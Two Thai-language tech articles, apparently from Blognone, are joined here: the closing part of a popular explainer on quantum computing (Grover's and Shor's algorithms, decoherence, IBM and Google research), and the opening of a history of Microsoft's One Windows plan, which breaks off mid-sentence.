ในขณะที่สถานะอื่นๆ จะมีโอกาสวัดเจอน้อยลง 5. กลับเครื่องหมายความน่าจะเป็นของการวัดคิวบิตแล้วได้สถานะที่ต้องการค้นหา จากลบให้กลับมาเป็นบวก *กราฟขวาล่าง* แสดงความน่าจะเป็นของสถานะข้อมูลเมื่อผ่านขั้นตอนนี้ นักวิทยาศาสตร์พิสูจน์มาแล้วว่า หากนำคิวบิตวนเข้ากระบวนการข้างต้นตั้งแต่ข้อ 2–5 ซ้ำไปเรื่อยๆ ประมาณ sqrt(N) รอบ เมื่อ N แทนจำนวนชุดข้อมูล ก็จะทำให้มีโอกาสวัดคิวบิตแล้วได้ตำแหน่งของข้อมูลที่เราต้องการสูงสุด - *\* *ถ้ายังงงๆ อยู่ ผมเขียนอธิบายอัลกอริทึมแบบละเอียดไว้ใน[คอมเมนต์](https://www.blognone.com/node/82946#cid-923583)ครับ* **Shor’s algorithm: อัลกอริทึมหาตัวประกอบเฉพาะของจำนวนเต็มขนาดใหญ่** ตัวประกอบเฉพาะของจำนวนเต็มขนาดใหญ่ (เช่น 3233 = 53 × 61 แต่ในความเป็นจริงใช้ตัวเลขใหญ่กว่านี้มาก) ต้องใช้เวลานานมาก อาจนานนับร้อยปีกว่าจะหาเจอ นั่นทำให้กระบวนการเข้ารหัสทั้งหลายที่นิยมใช้กันในปัจจุบัน เช่น กระบวนการเข้ารหัส RSA พึ่งความยากของปัญหานี้ในการเข้ารหัสข้อมูล แต่ในปี 1994 Peter Shor คิดอัลกอริทึมควอนตัมเพื่อแก้ปัญหานี้ได้สำเร็จโดยเทียบกันแล้วอาจใช้เวลาเพียงไม่กี่ปีเท่านั้น (สำหรับผู้เรียนวิทยาการคอมพิวเตอร์ ดูการเทียบ time complexity และ big O notation ของแต่ละอัลกอริทึมใน [Wikipedia](https://en.wikipedia.org/wiki/Shor%27s_algorithm)) หลักการอัลกอริทึมของ Shor จะอาศัยการลดรูปปัญหา ([problem reduction](https://en.wikipedia.org/wiki/Reduction_%28complexity%29)) โดยเอาวิธีการหาคาบของฟังก์ชัน f(x) = a<sup>x</sup> mod M (เมื่อ M แทนจำนวนเต็มบวกที่จะแยกตัวประกอบ และ a คือจำนวนเต็มบวกที่น้อยกว่า M) มาหาตัวประกอบเฉพาะของจำนวนเต็มแทน พูดง่ายๆ คือ ถ้าเราหาคาบของฟังก์ชันนี้ได้ เราก็จะสามารถหาตัวประกอบเฉพาะของจำนวนเต็มได้ ในการหาคาบของฟังก์ชันนั้นจะใช้คอมพิวเตอร์ควอนตัม แต่เนื่องจากกระบวนการมีความซับซ้อนมาก… (ก.ไก่ ล้านตัว) จึงขอบอกเพียงแค่ว่าในขั้นตอนหนึ่ง คิวบิตสถานะ superposition ที่ผ่านการคำนวณฟังก์ชันแล้ว จะถูกนำเข้าสู่กระบวนการ [quantum Fourier transform](https://en.wikipedia.org/wiki/Quantum_Fourier_transform) ซึ่งจะทำให้มีโอกาสสูงที่วัดคิวบิตแล้ว จะได้ตัวเลขที่สามารถนำไปคำนวณต่อเพื่อหาคาบของฟังก์ชันต่อไป และพอได้คาบของฟังก์ชันแล้ว เราก็เอาตัวเลขนี้ไปคำนวณกลับให้ได้ตัวประกอบเฉพาะตัวหนึ่งของจำนวนเต็มนั่นเอง อัลกอริทึมของ Shor สร้างผลกระทบต่อวิทยาการเข้ารหัสอย่างมหาศาล หากมีคนที่สามารถสร้างคอมพิวเตอร์ควอนตัมขนาดใหญ่ขึ้นมาได้แล้วละก็ ข้อมูลเข้ารหัสทั้งหมดจะตกอยู่ในความเสี่ยงทันที (แต่ไม่ต้องกังวลไปครับ นักวิทยาศาสตร์ได้เตรียมวิธีการเข้ารหัสแบบอื่นๆ เพื่อหลีกเลี่ยงปัญหานี้ไว้บ้างแล้ว แต่เราจะไม่พูดถึงในบทความนี้) อัลกอริทึมทั้งสองตัวอย่างที่ยกมานั้น เป็นเพียงอัลกอริทึมในเชิงทฤษฎีที่ยังต้องมีการทดสอบรันบนคอมพิวเตอร์ควอนตัมจริงๆ อย่างเมื่อเดือนเมษายนที่ผ่านมา ก็มีคนทดสอบ[แยกตัวประกอบของ 200099 ด้วยอัลกอริทึมของ Shor โดยใช้คอมพิวเตอร์ควอนตัม](http://arxiv.org/abs/1604.05796)ได้แล้ว อย่างไรก็ตาม การสร้างเครื่องคอมพิวเตอร์ควอนตัมให้ใช้งานได้จริงนั้นเป็นไปยากมาก เนื่องจากคอมพิวเตอร์จะต้องรักษาสถานะ superposition ของคิวบิตที่มีความเสถียรต่ำไว้ให้ได้ ## Superposition ก็มีวันสูญสลาย อุปสรรคสำคัญของการสร้างคอมพิวเตอร์ควอนตัม เนื่องจากคิวบิตเป็นอนุภาคเล็ก และอยู่ท่ามกลางอนุภาคอื่นๆ รายล้อมนับพัน จึงมีโอกาสสูงมากที่จะถูกอนุภาคในสภาพแวดล้อมเข้าไปรบกวนจนสถานะเปลี่ยนแปลงไป ทำให้ข้อมูลในสถานะ superposition สูญเสียไปด้วย เหตุการณ์ทั้งหมดนี้เกิดขึ้นเพียงแค่เสี้ยววินาทีเท่านั้น นอกจากนี้ ในทฤษฎี [no-cloning](http://www.nature.com/nature/journal/v299/n5886/abs/299802a0.html) บอกอีกว่า เราไม่สามารถคัดลอกสถานะของคิวบิตที่ไม่ทราบสถานะตัวหนึ่งไปยังคิวบิตอีกตัวหนึ่งได้ ทำให้การคัดลอกคิวบิตเพื่อสำรองข้อมูลเป็นไปไม่ได้ด้วย คอมพิวเตอร์ควอนตัมจึงต้องถูกออกแบบขึ้นโดยปกป้องคิวบิตไม่ให้ถูกสภาพแวดล้อมรบกวน เพื่อให้คิวบิตคงสถานะ superposition ให้ได้นานที่สุดจนกว่าการคำนวณจะเสร็จสิ้น สิ่งเหล่านี้ เป็นอุปสรรคที่ทำให้เครื่องคอมพิวเตอร์ควอนตัมขนาดใหญ่ไม่สามารถสร้างขึ้นมาได้โดยง่ายนัก นักวิทยาศาสตร์จึงต้องหาเทคนิคอื่นๆ เสริมเพื่อสร้างเครื่องคอมพิวเตอร์ควอนตัมที่สามารถใช้งานได้จริง การสร้างคอมพิวเตอร์ควอนตัมที่คงทนต่อสภาพแวดล้อมภายนอก ถือเป็นหลักเกณฑ์สำคัญข้อหนึ่งในการสร้างคอมพิวเตอร์ควอนตัมซึ่งตั้งขึ้นโดยนักฟิสิกส์ทฤษฎีนาม David DiVincenzo เรียกว่า [DiVincenzo’s criteria](https://arxiv.org/abs/quant-ph/0002077) มีทั้งหมด 5 หัวข้อ ดังนี้ 1. สมบัติทางกายภาพที่แทนสถานะ 0, 1, และ superposition ของคิวบิต และการขยายระบบด้วยการเพิ่มจำนวนคิวบิต 2. สถานะเริ่มต้นของคิวบิตก่อนใช้คำนวณ 3. ระบบที่คงทนต่อสภาพแวดล้อมภายนอก และการรักษาสถานะของคิวบิตตลอดการคำนวณ 4. เกตควอนตัมแบบ universal ในระบบ (เหมือนกับเกต NAND หรือเกต NOR บนคอมพิวเตอร์คลาสสิก) 5. กระบวนการวัดคิวบิตภายหลังการคำนวณ กรณีที่จะสร้างคอมพิวเตอร์ควอนตัมสำหรับการสื่อสาร จะมีหลักเกณฑ์เพิ่มอีก 2 หัวข้อ คือ 1. สมบัติทางกายภาพคิวบิตที่ใช้สื่อสารระหว่างระบบ (flying qubits) ที่อาจจะแตกต่างจากคิวบิตในระบบ (stationary qubits) และการแปลงข้อมูลคิวบิตแต่ละชนิดระหว่างกัน 2. การส่งผ่าน (transmit) คิวบิตระหว่างระบบในระยะไกล ## เราไปถึงไหนกันแล้ว ปัจจุบัน หลายๆ สถาบันทั่วโลกทั้งภาครัฐ ภาคเอกชน และมหาวิทยาลัย ต่างก็เร่งมือให้การสนับสนุนและผลิตงานวิจัยด้านการประมวลผลควอนตัมกันมากขึ้นเรื่อยๆ จนเรียกได้ว่าเป็นยุคทองของการวิจัยด้านนี้ โดยส่วนใหญ่แล้วจะมุ่งสร้างคอมพิวเตอร์ควอนตัมให้รองรับคิวบิตจำนวนมาก เพราะยิ่งมีคิวบิตในระบบมาก นักวิจัยก็จะสามารถใช้ทดลองรันอัลกอริทึมที่ซับซ้อน หรือรันด้วย input ขนาดใหญ่เพื่อทดสอบประสิทธิภาพของมันได้ เป้าหมายสูงสุดของการวิจัยอย่างหนึ่ง คือการสร้างคอมพิวเตอร์ที่สามารถรันอัลกอริทึมใดๆ ก็ได้ นักวิทยาศาสตร์เรียกคอมพิวเตอร์ควอนตัมประเภทนี้ว่าเป็น universal ซึ่ง IBM [คาดการณ์ไว้](http://www.research.ibm.com/quantum/expertise.html)ว่าอาจจะต้องใช้คิวบิตมากกว่าหนึ่งแสนตัวเลยทีเดียว การสร้างคอมพิวเตอร์สเกลใหญ่และมีความซับซ้อนแบบนี้อาจต้องรอกันอีกนาน เพราะเรายังต้องหาองค์ความรู้ที่เกี่ยวข้องกับการจัดการคิวบิตในปริมาณมากๆ ทั้งกระบวนการตรวจสอบและแก้ไขข้อผิดพลาด วัสดุทางกายภาพอื่นๆ ที่ใช้แทนคิวบิต จนไปถึงสถาปัตยกรรมต่างๆ ของคอมพิวเตอร์ควอนตัม อย่างไรก็ตาม วิทยาการต่างๆ ที่วิจัยกันออกมานั้นก็ทำให้การสร้างคอมพิวเตอร์ควอนตัมสเกลใหญ่เข้าใกล้ความจริงมากขึ้นเรื่อยๆ บทความนี้จะพูดถึงงานวิจัยจากสองสถาบัน ได้แก่ IBM และกูเกิล **IBM: เจ้าพ่อแห่งวงการคอมพิวเตอร์ควอนตัม** IBM มีประวัติในด้านการสนับสนุนงานวิจัยด้านคอมพิวเตอร์ควอนตัมมาตั้งแต่ช่วงถือกำเนิดของศาสตร์นี้แล้ว *ที่มา \- [IBM Quantum Computing](http://www.research.ibm.com/quantum/expertise.html)* ปี 1981 IBM ร่วมกับ MIT จัดงานประชุมทางวิชาการ (conference) ครั้งแรก ในหัวข้อ “The Physics of Computation” ปรากฏว่าในงานนี้ Richard Feynman นักฟิสิกส์ทฤษฎี ได้ไปเสนอไอเดียเกี่ยวกับการสร้างเครื่องคอมพิวเตอร์ควอนตัมเพื่อจำลองระบบควอนตัมไว้ ([quantum simulation](https://en.wikipedia.org/wiki/Quantum_simulator)) ถือว่าเป็นการบุกเบิกศาสตร์การประมวลผลควอนตัมครั้งแรกๆ ในประวัติศาสตร์ ปี 1984 Charles Bennett นักวิทยาศาสตร์จาก IBM Research และ Gilles Brassard นักวิจัยจาก Université de Montréal ประเทศแคนาดา เสนอไอเดียการเข้ารหัสข้อมูลด้วยหลักการฟิสิกส์ควอนตัมในนาม “[โปรโตคอล BB84](https://en.wikipedia.org/wiki/BB84)” ถือเป็นโปรโตคอลการเข้ารหัสข้อมูลควอนตัมตัวแรกของโลก และในปี 1993 Bennett, Brassard และคณะก็เป็นกลุ่มแรกที่นำเสนอกระบวนการ [quantum teleportation](https://en.wikipedia.org/wiki/Quantum_teleportation) ซึ่งเป็นการส่งข้อมูลคิวบิตระยะไกลโดยใช้หลักการของ [quantum entanglement](https://en.wikipedia.org/wiki/Quantum_entanglement) ปี 1996 David DiVincenzo ซึ่งทำงานที่ IBM ในสมัยนั้น นำเสนอหลักเกณฑ์ของการสร้างคอมพิวเตอร์ควอนตัม 7 ข้อ ในนาม DiVincenzo’s criteria หลักเกณฑ์นี้ก็ถูกนำไปใช้ในการสร้างเครื่องคอมพิวเตอร์ควอนตัมในช่วงเวลาต่อมา ปี 2001 IBM ประสบความสำเร็จในการแยกตัวประกอบเฉพาะของ 15 (= 3 × 5) ด้วยการรันอัลกอริทึมของ Shor บน[คอมพิวเตอร์ควอนตัมประเภท NMR](https://www-03.ibm.com/press/us/en/pressrelease/965.wss) (nuclear magnetic resonance) ปี 2012 IBM พบ[เทคนิคการสร้างคิวบิต](https://www-03.ibm.com/press/us/en/pressrelease/36901.wss)ที่สามารถรักษาสถานะ superposition ของคิวบิตไว้ได้นานถึง 100 ไมโครวินาที มากขึ้นเป็น 2–4 เท่าจากเดิม ปี 2015 IBM พัฒนาเทคนิคการตรวจจับและแก้ไขความผิดพลาดของข้อมูลคิวบิต ทั้งความผิดพลาดแบบ bit-flip และความผิดพลาดแบบ phase-flip และพัฒนาเทคนิคการตรวจสอบความผิดพลาดของคิวบิตระหว่างกันด้วยการเรียงคิวบิตเป็นสี่เหลี่ยมจัตุรัส *ข่าวเก่า \- [IBM ประกาศความสำเร็จด้านการวิจัยควอนตัมคอมพิวเตอร์](https://www.blognone.com/node/68343)* และเมื่อเดือนพฤษภาคมที่ผ่านมา IBM เปิดตัวคลาวด์ประมวลผลควอนตัมชื่อว่า [IBM Quantum Experience](http://www.research.ibm.com/quantum/) โดยเปิดโอกาสให้นักวิจัย นักศึกษา และบุคคลทั่วไป สามารถเข้าไปทดลองใช้คอมพิวเตอร์ควอนตัมแบบ universal จำนวน 5 คิวบิต IBM กล่าวเพิ่มเติมว่าในทศวรรษหน้าจะสร้างคอมพิวเตอร์ควอนตัมแบบ universal ที่มีจำนวนคิวบิต 50–100 ตัว *ข่าวเก่า \- [IBM เปิดตัวคลาวด์ทดลองใช้งานคอมพิวเตอร์ควอนตัมสำหรับนักวิจัย](https://www.blognone.com/node/80630)* **กูเกิล: คอมพิวเตอร์ควอนตัมสำหรับงานด้าน AI** ปี 2013 กูเกิลจัดตั้ง [Quantum Artificial Intelligence Lab](https://plus.google.com/+QuantumAILab) (QuAIL) โดยได้รับความร่วมมือจากศูนย์วิจัย [NASA Ames](https://www.nasa.gov/centers/ames/home/) และ [USRA](http://www.usra.edu/) (Universities Space Research Association) โดยซื้อเครื่องคอมพิวเตอร์ควอนตัมจากบริษัท [D-Wave Systems](http://www.dwavesys.com/) แม้ว่าคอมพิวเตอร์ D-Wave Two ที่ซื้อมาในสมัยนั้นจะมีคิวบิตมากถึง 512 ตัว แต่ก็ไม่ได้เป็นคอมพิวเตอร์แบบ universal วัตถุประสงค์หลักในการจัดตั้งแล็บของกูเกิล คือเพื่อศึกษาความเป็นไปได้ในการนำคอมพิวเตอร์ควอนตัมมาใช้ในงานด้าน machine learning โดยโฟกัสไปที่ปัญหาประเภท [optimization](https://en.wikipedia.org/wiki/Optimization_problem) นั่นคือปัญหาการเลือกสิ่งที่ดีที่สุดภายใต้เงื่อนไขและทรัพยากรจำกัด *ที่มา \- [Google Research Blog](https://research.googleblog.com/2013/05/launching-quantum-artificial.html)* ปี 2014 กูเกิลขยายไปทำวิจัยด้านโปรเซสเซอร์สำหรับคอมพิวเตอร์ควอนตัมเพิ่มเติม โดยได้ทีมวิจัย [Martinis Group](http://web.physics.ucsb.edu/~martinisgroup/) จากมหาวิทยาลัย UC Santa Barbara มาช่วยเสริมทัพอีกแรง *ที่มา \- [Google Research Blog](https://research.googleblog.com/2014/09/ucsb-partners-with-google-on-hardware.html)* ปี 2015 กูเกิลเผยผลการวิจัยคอมพิวเตอร์ควอนตัม D-Wave ว่าสามารถแก้โจทย์ปัญหาได้เร็วกว่าอัลกอริทึมแบบเดิม ทั้ง [simulated annealing](https://en.wikipedia.org/wiki/Simulated_annealing) และ [quantum Monte Carlo](https://en.wikipedia.org/wiki/Quantum_Monte_Carlo) มากถึง 10<sup>8</sup> เท่าเลยทีเดียว หลังจากที่ผ่านมา คอมพิวเตอร์ D-Wave เคยถูกตั้งข้อครหาถึงประสิทธิภาพของมัน *ข่าวเก่า \- [กูเกิลเผยผลการวิจัยควอนตัมคอมพิวเตอร์ D-Wave แก้ปัญหาได้เร็วขึ้น 10^8 เท่า](https://www.blognone.com/node/76154)* และเมื่อเดือนมิถุนายนที่ผ่านมา กูเกิลก็เผยความสำเร็จในการสร้างชิพคอมพิวเตอร์ควอนตัมขนาด 9 คิวบิต สามารถทำงานแบบ universal ได้ และมีระบบตรวจสอบและแก้ไขความผิดพลาดของคิวบิต (quantum error correction) ทำให้ในอนาคต นักวิจัยจะสามารถสร้างชิพที่มีจำนวนคิวบิตมากขึ้นเพื่อนำไปสร้างเป็นคอมพิวเตอร์ควอนตัมขนาดใหญ่ได้ *ข่าวเก่า \- [นักวิจัยกูเกิลสร้างคอมพิวเตอร์ควอนตัมแบบ “ลูกผสม” เข้าใกล้สู่การสร้างเพื่อใช้งานทั่วไป](https://www.blognone.com/node/82448)* ## บทสรุป บทความนี้อาจจะข้ามเนื้อหาบางส่วนเกี่ยวกับคอมพิวเตอร์ควอนตัมไปบ้าง (เช่น quantum entanglement, quantum simulation) แต่ก็เป็นการนำเสนอข้อมูลเกี่ยวกับคอมพิวเตอร์ควอนตัมในเบื้องต้น ซึ่งผมคิดว่าเพียงพอที่จะทำให้เห็นภาพได้ว่ามันคืออะไร มีดีกว่าคอมพิวเตอร์ที่เราใช้กันอยู่อย่างไร จะขอสรุปเพื่อเก็บประเด็นต่างๆ อีกสักรอบ - คอมพิวเตอร์ควอนตัมคือคอมพิวเตอร์ที่ประมวลผลด้วยหลักการของฟิสิกส์ควอนตัม - ด้วยความพิเศษของสถานะ superposition บนคิวบิต ทำให้มีการคิดค้นอัลกอริทึมควอนตัมบางตัวที่เร็วกว่าอัลกอริทึมบนคอมพิวเตอร์ทั่วๆ ไป เช่น อัลกอริทึมของ Grover ช่วยค้นหาข้อมูลได้เร็วขึ้น อัลกอริทึมของ Shor สามารถแยกตัวประกอบได้เร็วขึ้น - หากสร้างคอมพิวเตอร์ควอนตัมขึ้นมาสำเร็จ ระบบการเข้ารหัสข้อมูลทั่วโลกจะตกอยู่ในความเสี่ยงทันที แต่นักวิทยาศาสตร์ได้เตรียมหาทางหนีทีไล่ไว้แล้ว - คอมพิวเตอร์ควอนตัมไม่ได้สร้างกันได้ง่ายๆ เพราะสถานะทางควอนตัมของคิวบิตนั้นเปราะบางต่อสภาพแวดล้อมมาก - ปัจจุบัน ทั่วโลกกำลังวิจัยเพื่อสร้างคอมพิวเตอร์ควอนตัม และค้นหาขีดความสามารถของมันต่อไป เราอาจจะไม่ได้เห็นคอมพิวเตอร์ควอนตัมในอนาคตอันใกล้นี้ และอาจจะยังไม่ทราบได้แน่ชัดว่ามันจะมีประโยชน์ต่อมวลมนุษยชาติมากน้อยแค่ไหน แต่การสนับสนุนงานวิจัยก็จะช่วยทำให้เราเดินทางเข้าสู่ยุคต่อไปของคอมพิวเตอร์ได้เร็วขึ้น หรืออย่างน้อย แม้จะมีคนพบว่าคอมพิวเตอร์ควอนตัมไม่คุ้มที่จะสร้าง เราก็ได้เก็บเกี่ยวองค์ความรู้ในระหว่างทางไว้ เผื่อว่าจะใช้กรุยทางให้เกิดประโยชน์ในศาสตร์ด้านอื่นๆ ต่อไปได้ ยินดีต้อนรับสู่ยุคทองของการวิจัยคอมพิวเตอร์ควอนตัมครับ :) **แหล่งข้อมูลอ้างอิง** - [Quantum Computing: A Gentle Introduction](https://mitpress.mit.edu/books/quantum-computing) โดย Eleanor Rieffel และ Wolfgang Polak ผมใช้หนังสือเล่มนี้เป็นแหล่งอ้างอิงหลัก อันที่จริงผมอ่านแล้วมันไม่ค่อย gentle เท่าไหร่แฮะ - [A Brief History of Quantum Computing](http://www.doc.ic.ac.uk/~nd/surprise_97/journal/vol4/spb3/) โดย Simon Bone และ Matias Castro - [A tale of two qubits: how quantum computers work](http://arstechnica.com/science/2010/01/a-tale-of-two-qubits-how-quantum-computers-work/) โดย Joseph B. Altepeter ผ่านทาง Ars Technica - [Grover’s Quantum Search Algorithm](http://twistedoakstudios.com/blog/Post2644_grovers-quantum-search-algorithm) โดย Craig Gidney อธิบายอัลกอริทึมของ Grover ด้วยภาพกราฟฟิกของสถานะคิวบิต - [Shor, I’ll do it](http://www.scottaaronson.com/blog/?p=208) โดย Scott Aaronson อธิบายอัลกอริทึมของ Shor โดยไม่พูดถึงคณิตศาสตร์ระดับสูงแต่อย่างใด - [Quantum Algorithm Zoo](http://math.nist.gov/quantum/zoo/) โดย Stephen Jordan แหล่งรวบรวมข้อมูลเกี่ยวกับอัลกอริทึมควอนตัม
# One Windows ย้อนตำนานไมโครซอฟท์ กับการหลอมรวมระบบปฏิบัติการเป็นหนึ่งเดียว บทความนี้เป็นภาคต่อของ [ย้อนตำนาน Nokia เดินหมากพลาดตาเดียว พ่ายแพ้ทั้งกระดาน](https://www.blognone.com/node/58767) เราเห็นโนเกียทำระบบปฏิบัติการแล้วแก้ แก้แล้วทิ้ง อยู่หลายรอบ จนต้องยอมเสียเอกราชไปใช้ Windows Phone ของไมโครซอฟท์ แต่มาถึงวันนี้สถานการณ์ยังไม่ดีขึ้น ผู้ใช้ Windows Phone เองก็คงทราบปัญหาดีว่าไมโครซอฟท์ใช้เวลาพัฒนานานมาก นานจนเสียโอกาสหลายๆ อย่างไปเยอะ แต่การจะบอกว่า "ไมโครซอฟท์ขี้เกียจ" อย่างเดียวก็อาจมองโลกแคบไปสักนิด เพราะแท้จริงแล้ว พัฒนาการของ Windows Phone รวมถึง Windows 8.x เองถือเป็นส่วนหนึ่งของ[แผนการใหญ่ One Windows](https://www.blognone.com/node/55319) ของไมโครซอฟท์ด้วย บทความนี้จะพาย้อนรอยไปดูพัฒนาการของ Windows และมองอนาคตไปกับแผน One Windows ว่าจะมีเส้นทางอย่างไรต่อไปครับ ### อะไรคือ One Windows **One Windows** เป็นชื่อสโลแกนที่ไมโครซอฟท์เพิ่งประกาศเมื่อต้นปีนี้ ความหมายของมันคือไมโครซอฟท์ต้องการรวมระบบปฏิบัติการของตัวเองให้เป็นแพลตฟอร์มเดียวกัน (ไม่ได้แปลว่าจะมี Windows เหลือเพียงรุ่นเดียว) โดยระบบปฏิบัติการในสังกัดคือ Windows เดสก์ท็อป, Windows Phone และระบบปฏิบัติการของ Xbox One ตามวิสัยทัศน์นี้ ระบบปฏิบัติการทุกตัวของไมโครซอฟท์จะใช้แกนเดียวกัน ใช้แพลตฟอร์มการพัฒนาแอพเหมือนกัน แต่จะมีส่วนติดต่อผู้ใช้ที่แตกต่างกันไปตามธรรมชาติของแต่ละอุปกรณ์ การสร้างแอพภายใต้วิสัยทัศน์ One Windows จะช่วยให้นักพัฒนาสามารถพอร์ตแอพข้ามไปข้ามมาบนระบบปฏิบัติการในเครือได้ง่าย ปัจจัยเร่งให้ไมโครซอฟท์ต้องหลอมรวมระบบปฏิบัติการของตัวเองเข้าด้วยกัน เกิดจากพัฒนาการของวงการไอทีเองที่เกิดสภาวะ convergence ระหว่างอุปกรณ์ประเภทต่างๆ ทั้งพีซี สมาร์ทโฟน แท็บเล็ต และอุปกรณ์ชนิดอื่นๆ แต่ว่าก่อนที่ไมโครซอฟท์จะเดินทางมาถึงจุดนี้ได้ก็เป็นเวลาที่ยาวนานทีเดียว เพื่อให้เข้าใจถึงความสำคัญของ One Windows คงต้องย้อนประวัติพัฒนาการของ Windows กันสักหน่อยนะครับ เอาแบบพอสังเขปไม่ต้องลงลึกมาก ในแผนภาพข้างล่างก็แสดงให้เห็นสายการพัฒนาแบบสรุปพอให้เห็นภาพ ไม่ลงรายละเอียดทั้งหมด ### ย้อนตำนาน Windows กว่าจะมาถึงวันนี้ ที่ผ่านมา ไมโครซอฟท์มีผลิตภัณฑ์ที่ใช้ชื่อ Windows ทำตลาดอยู่หลายตัว และบางตัวก็ไม่มีส่วนเกี่ยวข้องกันในแง่เทคนิคเลยยกเว้นชื่อ (เช่น Windows กับ Windows Mobile ในอดีต) ทำให้บางคนอาจสับสนในแง่สายสัมพันธ์ระหว่าง Windows แต่ละรุ่นได้ แรกสุดเลย ไมโครซอฟท์สร้าง Windows ขึ้นมาเป็น GUI ของระบบปฏิบัติการ DOS (นั่นคือ Windows 1.x-3.x) มันไม่สามารถทำงานได้ถ้าไม่มี DOS ซึ่งภายหลัง ไมโครซอฟท์ก็พัฒนามันให้เป็น "ระบบปฏิบัติการเต็มรูปแบบ" นับตั้งแต่ Windows 95 เป็นต้นมา โดยเคอร์เนลของระบบปฏิบัติการใช้ DOS เวอร์ชันดัดแปลงที่เรียกกันภายในว่า Cougar และใช้เคอร์เนลนี้สืบเนื่องมาตลอดในสายของ Windows 9x (สิ้นสุดที่ Windows ME) ไมโครซอฟท์ทราบดีว่าเคอร์เนลของ Windows 9x มีข้อจำกัดในแง่เทคนิคหลายประการ จึงแบ่งทรัพยากรไปทำ Windows NT ที่มีเคอร์เนลทันสมัยกว่า เสถียรกว่า และเน้นจับตลาด workstation/server ที่ต่างไปจากตลาดคอนซูเมอร์ของ Windows 9x ตามแผนของไมโครซอฟท์คือจะแทนที่เคอร์เนลของ Windows 9x ด้วยเคอร์เนลของ NT ซึ่งแผนการนี้มาสำเร็จในยุคของ Windows XP ที่ใช้เคอร์เนลจาก Windows 2000 (เป็นเหตุผลที่ทำให้ XP เสถียรกว่า 9x มาก) หลังจากนั้น ไมโครซอฟท์ประสบปัญหาในการพัฒนา Windows รุ่นต่อจาก XP จนต้องรื้อทำใหม่หลายครั้ง สุดท้ายหันมาใช้แกนของ Windows 2003 ที่เสถียรกว่า จนกลายมาเป็น Vista และสืบทอดมาเป็น Windows 8.1 ในปัจจุบัน (ในสายของ Windows Server เองก็ไล่มาจนถึง Windows 2012 R2 เช่นกัน) สรุปว่าระบบปฏิบัติการสำหรับพีซีของไมโครซอฟท์ถูกเปลี่ยนมาเป็นแกนของ Windows NT เดิมมานานแล้ว (ตั้งแต่ปี 2001) และไมโครซอฟท์ก็ปรับปรุงให้ระบบปฏิบัติการ "โมเดิร์น" ขึ้นเต็มที่ในปี 2012 คือรองรับอินเทอร์เฟซจอสัมผัส Metro และใช้การพัฒนาโปรแกรมแนว **WinRT** เป็นต้นมา (รายละเอียดอ่านในบทความ [รู้จักกับ Metro Style App และ WinRT คู่หูของการพัฒนาโปรแกรมบน Windows 8](https://www.blognone.com/news/26417/)) ย้ำอีกรอบว่า Windows ยุคใหม่ต้องประกอบด้วยคุณสมบัติ 3 ข้อคือ ใช้แกน Windows NT, รองรับการพัฒนาโปรแกรมแบบ WinRT และส่วนติดต่อผู้ใช้จอสัมผัส Metro/Modern ### จาก Windows Mobile สู่ Windows Phone สำหรับตลาดอุปกรณ์พกพา ไมโครซอฟท์แยกไปทำ Windows CE มานานแล้ว และออกระบบปฏิบัติการสำหรับอุปกรณ์พกพา (พีดีเอ-สมาร์ทโฟน) ในชื่อ PocketPC ก่อนจะกลายมาเป็น Windows Mobile และ Windows Phone ในปัจจุบัน ระบบปฏิบัติการตระกูล Windows CE มีความเกี่ยวข้องกับ Windows บนพีซีแค่ชื่อเท่านั้น สถาปัตยกรรมทางเทคนิคทุกอย่างแตกต่างกันทั้งหมด ถ้าลองพิจารณา Pocket PC หรือ Windows Mobile จะเห็นว่ามันใช้แกน Windows CE, มีอินเทอร์เฟซของตัวเอง, ใช้เครื่องมือพัฒนาโปรแกรมเฉพาะของตัวเอง (เช่น C++ หรือ .NET Compact Framework) และแน่นอนว่าใช้ทีมงานพัฒนาแยกขาดจาก Windows ฝั่งพีซี แต่ในเมื่ออนาคตของอุปกรณ์พกพาคือ "พีซีย่อส่วน" ซึ่งเราเห็นแนวโน้มนี้ชัดเจนจาก iOS ที่พัฒนาต่อมาจาก OS X หรือ Android ที่พัฒนาจาก Linux ทำให้ไมโครซอฟท์ต้องปรับตัวรับความเปลี่ยนแปลงนี้เช่นกัน โดยเริ่มจาก Windows Phone 7 ที่เปิดตัวในปี 2010 อย่างไรก็ตาม กระบวนการ "เปลี่ยนผ่าน" ของ Windows Mobile/Phone ไม่ได้เกิดขึ้นรวดเร็วนัก เพราะมีกระบวนการลองผิดลองถูกระหว่างทางอยู่มาก และต้องใช้เวลาหลายรุ่นกว่าจะเปลี่ยนผ่านสำเร็จ ตอนไมโครซอฟท์เปลี่ยนจาก Windows Mobile 6.x มาเป็น Windows Phone 7 สิ่งที่เปลี่ยนแปลงคือ - เปลี่ยนแบรนด์ เปลี่ยนโลโก้ - เปลี่ยนอินเทอร์เฟซมาเป็น Metro - เปลี่ยนเครื่องมือพัฒนาโปรแกรมเป็น Silverlight ตรงนี้ต้องอธิบายนิดนึงว่า Windows Phone 7 เป็นระบบปฏิบัติการตัวแรกสุดของไมโครซอฟท์ที่ปรับมาเป็น Metro ทำให้ไมโครซอฟท์เองก็ยังงงๆ ว่าจะสร้างแพลตฟอร์มการพัฒนาอย่างไรดี (ไมโครซอฟท์มีเครื่องมือการพัฒนาหลายสาย เช่น C++ ปกติ, .NET, Silverlight ซึ่งเป็น .NET ลดรูป) สุดท้ายไมโครซอฟท์เลือก Silverlight ที่ออกแบบมาสำหรับการพัฒนา Rich Internet Application (RIA) โดยแยกพัฒนาเป็น Silverlight เวอร์ชันพิเศษสำหรับ Windows Phone (อิงจาก Silverlight 4) อย่างไรก็ตาม แกนหลักของตัวระบบปฏิบัติการ Windows Phone 7 ยังเป็น Windows CE ซึ่งยังไม่ "ทันสมัย" อย่างที่ไมโครซอฟท์ต้องการ ปี 2012 ไมโครซอฟท์ออก Windows Phone 8 ที่ "ยกเครื่อง" ภายในอีกรอบ แม้ส่วนติดต่อผู้ใช้จะเป็น Metro เหมือนเดิม แต่ภายในเปลี่ยนใหม่หมด แกนหลักของระบบปฏิบัติการเปลี่ยนมาใช้ Windows NT และเทคโนโลยีการพัฒนาแอพเปลี่ยนมาใช้ **Windows Phone Runtime** (เรียกกันย่อๆ ในวงการว่า WPRT) [WPRT](http://msdn.microsoft.com/en-us/library/windows/apps/ff626516%28v=vs.105%29.aspx) เป็นเวอร์ชันลดรูปของ WinRT ที่ใช้กับ Windows 8 ที่ออกในปีเดียวกัน (2012) เหตุผลที่ไมโครซอฟท์ใช้ WPRT กับ WP8 น่าจะเกิดจาก "ทำไม่ทัน" เป็นหลัก (ตรงนี้ไม่มีข้อมูลยืนยันนะครับ) ผลกระทบของการที่ WPRT 